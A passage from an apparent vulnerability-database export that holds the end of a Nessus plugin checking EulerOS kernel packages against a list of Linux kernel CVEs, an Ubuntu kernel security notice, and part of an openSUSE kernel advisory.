WiFi chip driver.\n The flaw could occur when the station attempts a\n connection negotiation during the handling of the\n remote devices country settings. This could allow the\n remote device to cause a denial of service (system\n crash) or possibly execute arbitrary\n code.(CVE-2019-14895)The acpi_ds_create_operands()\n function in drivers/acpi/acpica/dsutils.c in the Linux\n kernel through 4.12.9 does not flush the operand cache\n and causes a kernel stack dump, which allows local\n users to obtain sensitive information from kernel\n memory and bypass the KASLR protection mechanism (in\n the kernel through 4.9) via a crafted ACPI\n table.(CVE-2017-13693)Linux kernel CIFS implementation,\n version 4.9.0 is vulnerable to a relative paths\n injection in directory entry lists.(CVE-2019-10220)A\n heap overflow flaw was found in the Linux kernel, all\n versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi\n chip driver. The vulnerability allows a remote attacker\n to cause a system crash, resulting in a denial of\n service, or execute arbitrary code. The highest threat\n with this vulnerability is with the availability of the\n system. If code execution occurs, the code will run\n with the permissions of root. This will affect both\n confidentiality and integrity of files on the\n system.(CVE-2019-14901)In the AppleTalk subsystem in\n the Linux kernel before 5.1, there is a potential NULL\n pointer dereference because register_snap_client may\n return NULL. This will lead to denial of service in\n net/appletalk/aarp.c and net/appletalk/ddp.c, as\n demonstrated by unregister_snap_client, aka\n CID-9804501fa122.(CVE-2019-19227)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/usb/class/cdc-acm.c driver, aka\n CID-c52873e5a1ef.(CVE-2019-19530)In the Linux kernel\n before 5.3.9, there are multiple out-of-bounds write\n bugs that can be caused by a malicious USB device in\n the Linux kernel HID drivers, aka CID-d9d4b1e46d95.\n This affects drivers/hid/hid-axff.c,\n drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c,\n drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c,\n drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c,\n drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c,\n drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c,\n drivers/hid/hid-tmff.c, and\n drivers/hid/hid-zpff.c.(CVE-2019-19532)A use-after-free\n in binder.c allows an elevation of privilege from an\n application to the Linux Kernel. No user interaction is\n required to exploit this vulnerability, however\n exploitation does require either the installation of a\n malicious local application or a separate vulnerability\n in a network facing application.Product: AndroidAndroid\n ID: A-141720095(CVE-2019-2215)The do_remount function\n in fs/ namespace.c in the Linux kernel through 3.16.1\n does not maintain the MNT_LOCK_READONLY bit across a\n remount of a bind mount, which allows local users to\n bypass an intended read-only restriction and defeat\n certain sandbox protection mechanisms via a 'mount -o\n remount' command within a user\n namespace.(CVE-2014-5206)Multiple integer overflows in\n the lzo1x_decompress_safe function in\n lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor\n in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)The\n pivot_root implementation in fs/ namespace.c in the\n Linux kernel through 3.17 does not properly interact\n with certain locations of a chroot directory, which\n allows local users to cause a denial of service\n (mount-tree loop) via . (dot) values in both arguments\n to the pivot_root system call.(CVE-2014-7970)A security\n flaw was discovered in nl80211_set_rekey_data()\n function in the Linux kernel since v3.1-rc1 through\n v4.13. This function does not check whether the\n required attributes are present in a netlink request.\n This request can be issued by a user with CAP_NET_ADMIN\n privilege and may result in NULL dereference and a\n system crash.(CVE-2017-12153)arch/x86/kernel/entry_32.S\n in the Linux kernel through 3.15.1 on 32-bit x86\n platforms, when syscall auditing is enabled and the sep\n CPU feature flag is set, allows local users to cause a\n denial of service (OOPS and system crash) via an\n invalid syscall number, as demonstrated by number\n 1000.(CVE-2014-4508)fs/ namespace.c in the Linux kernel\n through 3.16.1 does not properly restrict clearing\n MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\n MNT_ATIME_MASK during a remount of a bind mount, which\n allows local users to gain privileges, interfere with\n backups and auditing on systems that had atime enabled,\n or cause a denial of service (excessive filesystem\n updating) on systems that had atime disabled via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)In the Linux kernel before\n 5.3.7, there is a use-after-free bug that can be caused\n by a malicious USB device in the\n drivers/usb/misc/adutux.c driver, aka\n CID-44efc269db79.(CVE-2019-19523)In the Linux kernel\n before 5.3.12, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/input/ff-memless.c driver, aka\n CID-fa3a5a1880c9.(CVE-2019-19524)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/hid/usbhid/hiddev.c driver, aka\n CID-9c09b214f30e.(CVE-2019-19527)In the Linux kernel\n before 5.3.7, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/iowarrior.c driver, aka\n CID-edc4746f253d.(CVE-2019-19528)In the Linux kernel\n before 5.2.9, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/yurex.c driver, aka\n CID-fc05481b2fca.(CVE-2019-19531)In the Linux kernel\n before 5.3.4, there is an info-leak bug that can be\n caused by a malicious USB device in the\n drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka\n CID-a10feaf8c464.(CVE-2019-19533)In the Linux kernel\n before 5.3.11, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_core.c driver, aka\n CID-f7a1337f0d29..(CVE-2019-19534)In the Linux kernel\n before 5.2.9, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_pro.c driver, aka\n CID-ead16e53c2f0.(CVE-2019-19536)In the Linux kernel\n before 5.2.10, there is a race condition bug that can\n be caused by a malicious USB device in the USB\n character device driver layer, aka CID-303911cfc5b9.\n This affects drivers/usb/core/file.c.(CVE-2019-19537)A\n memory leak in the cx23888_ir_probe() function in\n drivers/media/pci/cx23885/cx23888-ir.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption) by triggering\n kfifo_alloc() failures, aka\n CID-a7b2df76b42b.(CVE-2019-19054)A memory leak in the\n mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-db8fd2cde932.(CVE-2019-19056)Two memory leaks in\n the mwifiex_pcie_init_evt_ring() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-d10dcb615c8e.(CVE-2019-19057)A memory leak in the\n adis_update_scan_mode() function in\n drivers/iio/imu/adis_buffer.c in the Linux kernel\n before 5.3.9 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-ab612b1daf41.(CVE-2019-19060)A memory leak in the\n crypto_report() function in crypto/crypto_user_base.c\n in the Linux kernel through 5.3.11 allows attackers to\n cause a denial of service (memory consumption) by\n triggering crypto_report_alg() failures, aka\n CID-ffdde5932042.(CVE-2019-19062)Two memory leaks in\n the rtl_usb_probe() function in drivers/\n net/wireless/realtek/rtlwifi/usb.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption), aka\n CID-3f9361695113.(CVE-2019-19063)A memory leak in the\n bfad_im_get_stats() function in\n drivers/scsi/bfa/bfad_attr.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n bfa_port_get_stats() failures, aka\n CID-0e62395da2bd.(CVE-2019-19066)Memory leaks in\n drivers/ net/wireless/ath/ath9k/htc_hst.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption) by triggering\n wait_for_completion_timeout() failures. This affects\n the htc_config_pipe_credits() function, the\n htc_setup_complete() function, and the\n htc_connect_service() function, aka\n CID-853acf7caf10.(CVE-2019-19073)A memory leak in the\n ath9k_wmi_cmd() function in drivers/\n net/wireless/ath/ath9k/wmi.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-728c1e2a05e4.(CVE-2019-19074)An issue was\n discovered in fs/xfs/xfs_icache.c in the Linux kernel\n through 4.17.3. There is a NULL pointer dereference and\n panic in lookup_slow() on a NULL inode->i_ops pointer\n when doing pathwalks on a corrupted xfs image. This\n occurs because of a lack of proper validation that\n cached inodes are free during\n allocation.(CVE-2018-13093)An issue was discovered in\n slc_bump in drivers/ net/can/slcan.c in the Linux\n kernel through 5.6.2. It allows attackers to read\n uninitialized can_frame data, potentially containing\n sensitive information from kernel stack memory, if the\n configuration lacks CONFIG_INIT_STACK_ALL, aka\n CID-b9258a2cece4.(CVE-2020-11494)An issue was\n discovered in the Linux kernel through 5.6.2.\n mpol_parse_str in mm/mempolicy.c has a stack-based\n out-of-bounds write because an empty nodelist is\n mishandled during mount option parsing, aka\n CID-aa9f7d5172fa. NOTE: Someone in the security\n community disagrees that this is a vulnerability\n because the issue 'is a bug in parsing mount options\n which can only be specified by a privileged user, so\n triggering the bug does not grant any powers not\n already held.'.(CVE-2020-11565)In the Linux kernel\n before 5.4.12, drivers/input/input.c has out-of-bounds\n writes via a crafted keycode table, as demonstrated by\n input_set_keycode, aka\n CID-cb222aed03d7.(CVE-2019-20636)An issue was\n discovered in the Linux kernel before 5.6.1.\n drivers/media/usb/gspca/ov519.c allows NULL pointer\n dereferences in ov511_mode_init_regs and\n ov518_mode_init_regs when there are zero endpoints, aka\n CID-998912346c0d.(CVE-2020-11608)An issue was\n discovered in the stv06xx subsystem in the Linux kernel\n before 5.6.1. drivers/media/usb/gspca/stv06xx/stv06xx.c\n and drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c\n mishandle invalid descriptors, as demonstrated by a\n NULL pointer dereference, aka\n CID-485b06aadb93.(CVE-2020-11609)In the Linux kernel\n before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c\n (aka the Xirlink camera USB driver) mishandles invalid\n descriptors, aka CID-a246b4d54770.(CVE-2020-11668)A\n flaw was found in the Linux kernel's implementation of\n GRO. This flaw allows an attacker with local access to\n crash the\n system.(CVE-2020-10720)gadget_dev_desc_UDC_store in\n drivers/usb/gadget/configfs.c in the Linux kernel\n through 5.6.13 relies on kstrdup without considering\n the possibility of an internal '\\0' value, which allows\n attackers to trigger an out-of-bounds read, aka\n CID-15753588bcd4.(CVE-2020-13143)An issue was\n discovered in the Linux kernel through 5.6.11. sg_write\n lacks an sg_remove_request call in a certain failure\n case, aka CID-83c6f2390040.(CVE-2020-12770)A signal\n access-control issue was discovered in the Linux kernel\n before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in\n include/linux/sched.h is only 32 bits, an integer\n overflow can interfere with a do_notify_parent\n protection mechanism. A child process can send an\n arbitrary signal to a parent process in a different\n security domain. Exploitation limitations include the\n amount of elapsed time before an integer overflow\n occurs, and the lack of scenarios where signals to a\n parent process present a substantial operational\n threat.(CVE-2020-12826)The fix for CVE-2019-11599,\n affecting the Linux kernel before 5.0.10 was not\n complete. A local user could use this flaw to obtain\n sensitive information, cause a denial of service, or\n possibly have other unspecified impacts by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-14898)usb_sg_cancel in\n drivers/usb/core/message.c in the Linux kernel before\n 5.6.8 has a use-after-free because a transfer occurs\n without a reference, aka\n CID-056ad39ee925.(CVE-2020-12464)The __mptctl_ioctl\n function in drivers/message/fusion/mptctl.c in the\n Linux kernel before 5.4.14 allows local users to hold\n an incorrect lock during the ioctl operation and\n trigger a race condition, i.e., a 'double fetch'\n vulnerability, aka CID-28d76df18f0a. NOTE: the vendor\n states 'The security impact of this bug is not as bad\n as it could have been because these operations are all\n privileged and root already has enormous destructive\n power.'(CVE-2020-12652)An issue was found in Linux\n kernel before 5.5.4. The mwifiex_cmd_append_vsie_tlv()\n function in drivers/\n net/wireless/marvell/mwifiex/scan.c allows local users\n to gain privileges or cause a denial of service because\n of an incorrect memcpy and buffer overflow, aka\n CID-b70261a288ea.(CVE-2020-12653)An issue was found in\n Linux kernel before 5.5.4. mwifiex_ret_wmm_get_status()\n in drivers/ net/wireless/marvell/mwifiex/wmm.c allows a\n remote AP to trigger a heap-based buffer overflow\n because of an incorrect memcpy, aka\n CID-3a9b153c5591.(CVE-2020-12654)An issue was\n discovered in xfs_agf_verify in\n fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through\n 5.6.10. Attackers may trigger a sync of excessive\n duration via an XFS v5 image with crafted metadata, aka\n CID-d0c7feaf8767.(CVE-2020-12655)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1674\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35c58a13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.62.59.83.h230\",\n \"kernel-debug-3.10.0-327.62.59.83.h230\",\n \"kernel-debug-devel-3.10.0-327.62.59.83.h230\",\n \"kernel-debuginfo-3.10.0-327.62.59.83.h230\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.62.59.83.h230\",\n \"kernel-devel-3.10.0-327.62.59.83.h230\",\n \"kernel-headers-3.10.0-327.62.59.83.h230\",\n \"kernel-tools-3.10.0-327.62.59.83.h230\",\n \"kernel-tools-libs-3.10.0-327.62.59.83.h230\",\n \"perf-3.10.0-327.62.59.83.h230\",\n \"python-perf-3.10.0-327.62.59.83.h230\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:53", "bulletinFamily": "software", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2318-1\r\nAugust 18, 2014\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nEric W. Biederman discovered a flaw with the mediation of mount flags in\r\nthe Linux kernel's user namespace subsystem. An unprivileged user could\r\nexploit this flaw to by-pass mount restrictions, and potentially gain\r\nadministrative privileges. (CVE-2014-5207)\r\n\r\nKenton Varda discovered a flaw with read-only bind mounds when used with\r\nuser namespaces. An unprivileged local user could exploit this flaw to gain\r\nfull write privileges to a mount that should be read only. (CVE-2014-5206)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n linux-image-3.13.0-34-generic 3.13.0-34.60\r\n linux-image-3.13.0-34-generic-lpae 3.13.0-34.60\r\n linux-image-3.13.0-34-lowlatency 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc-e500 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc-e500mc 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc-smp 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc64-emb 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc64-smp 3.13.0-34.60\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2318-1\r\n CVE-2014-5206, CVE-2014-5207\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.13.0-34.60\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "SECURITYVULNS:DOC:31007", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31007", "title": "[USN-2318-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-4699", "CVE-2014-5206", "CVE-2014-5207"], "description": "DoS via ptrace syscall, filesystems mount options limitation bypass.", "edition": 1, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "SECURITYVULNS:VULN:13914", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13914", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:38:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2014-3182", "CVE-2013-2898", "CVE-2014-3186", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-9090", "CVE-2014-3688", "CVE-2014-7841", "CVE-2013-2891", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-9322", "CVE-2014-0206", "CVE-2014-3181", "CVE-2014-8709", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-7975", "CVE-2014-3185", "CVE-2014-5206", "CVE-2014-4715", "CVE-2014-8884", "CVE-2014-4608", "CVE-2014-4611", "CVE-2013-7263", "CVE-2014-0181", "CVE-2014-5207", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-8133", "CVE-2014-7826", "CVE-2014-3184", "CVE-2014-3687"], "description": "The openSUSE 13.1 kernel was updated to fix security issues and bugs:\n\n Security issues fixed: CVE-2014-9322: A local privilege escalation in the\n x86_64 32bit compatibility signal handling was fixed, which could be used\n by local attackers to crash the machine or execute code.\n\n CVE-2014-9090: The do_double_fault function in arch/x86/kernel/traps.c in\n the Linux kernel did not properly handle faults associated with the Stack\n Segment (SS) segment register, which allowed local users to cause a denial\n of service (panic) via a modify_ldt system call, as demonstrated by\n sigreturn_32 in the linux-clock-tests test suite.\n\n CVE-2014-8133: Insufficient validation of TLS register usage could leak\n information from the kernel stack to userspace.\n\n CVE-2014-0181: The Netlink implementation in the Linux kernel through\n 3.14.1 did not provide a mechanism for authorizing socket operations based\n on the opener of a socket, which allowed local users to bypass intended\n access restrictions and modify network configurations by using a Netlink\n socket for the (1) stdout or (2) stderr of a setuid program. (bsc#875051)\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on 32-bit\n x86 platforms, when syscall auditing is enabled and the sep CPU feature\n flag is set, allowed local users to cause a denial of service (OOPS and\n system crash) via an invalid syscall number, as demonstrated by number\n 1000.\n\n CVE-2014-3688: The SCTP implementation in the Linux kernel allowed remote\n attackers to cause a denial of service (memory consumption) by triggering\n a large number of chunks in an association's output queue, as demonstrated\n by ASCONF probes, related to net/sctp/inqueue.c and\n net/sctp/sm_statefuns.c.\n\n CVE-2014-3687: The sctp_assoc_lookup_asconf_ack function in\n net/sctp/associola.c in the SCTP implementation in the Linux kernel\n allowed remote attackers to cause a denial of service (panic) via\n duplicate ASCONF chunks that trigger an incorrect uncork within the\n side-effect interpreter.\n\n CVE-2014-7975: The do_umount function in fs/namespace.c in the Linux\n kernel did not require the CAP_SYS_ADMIN capability for do_remount_sb\n calls that change the root filesystem to read-only, which allowed local\n users to cause a denial of service (loss of writability) by making certain\n unshare system calls, clearing the / MNT_LOCKED flag, and making an\n MNT_FORCE umount system call.\n\n CVE-2014-8884: Stack-based buffer overflow in the\n ttusbdecfe_dvbs_diseqc_send_master_cmd function in\n drivers/media/usb/ttusb-dec/ttusbdecfe.c in the Linux kernel allowed local\n users to cause a denial of service (system crash) or possibly gain\n privileges via a large message length in an ioctl call.\n\n CVE-2014-3673: The SCTP implementation in the Linux kernel allowed remote\n attackers to cause a denial of service (system crash) via a malformed\n ASCONF chunk, related to net/sctp/sm_make_chunk.c and\n net/sctp/sm_statefuns.c.\n\n CVE-2014-3186: Buffer overflow in the picolcd_raw_event function in\n devices/hid/hid-picolcd_core.c in the PicoLCD HID device driver in the\n Linux kernel, as used in Android on Nexus 7 devices, allowed physically\n proximate attackers to cause a denial of service (system crash) or\n possibly execute arbitrary code via a crafted device that sends a large\n report.\n\n CVE-2014-7841: The sctp_process_param function in net/sctp/sm_make_chunk.c\n in the SCTP implementation in the Linux kernel, when ASCONF is used,\n allowed remote attackers to cause a denial of service (NULL pointer\n dereference and system crash) via a malformed INIT chunk.\n\n CVE-2014-4611: Integer overflow in the LZ4 algorithm implementation, as\n used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in\n lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit\n platforms might allow context-dependent attackers to cause a denial of\n service (memory corruption) or possibly have unspecified other impact via\n a crafted Literal Run that would be improperly handled by programs not\n complying with an API limitation, a different vulnerability than\n CVE-2014-4715.\n\n CVE-2014-4608: Multiple integer overflows in the lzo1x_decompress_safe\n function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the\n Linux kernel allowed context-dependent attackers to cause a denial\n of service (memory corruption) via a crafted Literal Run.\n\n CVE-2014-8709: The ieee80211_fragment function in net/mac80211/tx.c in the\n Linux kernel did not properly maintain a certain tail pointer, which\n allowed remote attackers to obtain sensitive cleartext information by\n reading packets.\n\n CVE-2014-3185: Multiple buffer overflows in the command_port_read_callback\n function in drivers/usb/serial/whiteheat.c in the Whiteheat USB Serial\n Driver in the Linux kernel allowed physically proximate attackers to\n execute arbitrary code or cause a denial of service (memory corruption and\n system crash) via a crafted device that provides a large amount of (1)\n EHCI or (2) XHCI data associated with a bulk response.\n\n CVE-2014-3184: The report_fixup functions in the HID subsystem in the\n Linux kernel might have allowed physically proximate attackers to cause a\n denial of service (out-of-bounds write) via a crafted device that provides\n a small report descriptor, related to (1) drivers/hid/hid-cherry.c, (2)\n drivers/hid/hid-kye.c, (3) drivers/hid/hid-lg.c, (4)\n drivers/hid/hid-monterey.c, (5) drivers/hid/hid-petalynx.c, and (6)\n drivers/hid/hid-sunplus.c.\n\n CVE-2014-3182: Array index error in the logi_dj_raw_event function in\n drivers/hid/hid-logitech-dj.c in the Linux kernel allowed physically\n proximate attackers to execute arbitrary code or cause a denial of service\n (invalid kfree) via a crafted device that provides a malformed\n REPORT_TYPE_NOTIF_DEVICE_UNPAIRED value.\n\n CVE-2014-3181: Multiple stack-based buffer overflows in the\n magicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the Magic\n Mouse HID driver in the Linux kernel allowed physically proximate\n attackers to cause a denial of service (system crash) or possibly execute\n arbitrary code via a crafted device that provides a large amount of (1)\n EHCI or (2) XHCI data associated with an event.\n\n CVE-2014-7826: kernel/trace/trace_syscalls.c in the Linux kernel did not\n properly handle private syscall numbers during use of the ftrace\n subsystem, which allowed local users to gain privileges or cause a denial\n of service (invalid pointer dereference) via a crafted application.\n\n CVE-2013-7263: The Linux kernel updated certain length values before\n ensuring that associated data structures have been initialized, which\n allowed local users to obtain sensitive information from kernel stack\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call,\n related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c,\n net/ipv6/raw.c, and net/ipv6/udp.c. This update fixes the leak of the port\n number when using ipv6 sockets. (bsc#853040).\n\n CVE-2013-2898: Fixed potential kernel caller confusion via\n past-end-of-heap-allocation read in sensor-hub HID driver.\n\n CVE-2013-2891: Fixed 16 byte past-end-of-heap-alloc zeroing in steelseries\n HID driver.\n\n VE-2014-6410: The __udf_read_inode function in fs/udf/inode.c in the Linux\n kernel did not restrict the amount of ICB indirection, which allowed\n physically proximate attackers to cause a denial of service (infinite loop\n or stack consumption) via a UDF filesystem with a crafted inode.\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel allowed local users to cause a denial of service (uncontrolled\n recursion, and system crash or reboot) via a crafted iso9660 image with a\n CL entry referring to a directory entry that has a CL entry.\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel allowed local users to cause a denial\n of service (unkillable mount process) via a crafted iso9660 image with a\n self-referential CL entry.\n\n CVE-2014-0206: Array index error in the aio_read_events_ring function in\n fs/aio.c in the Linux 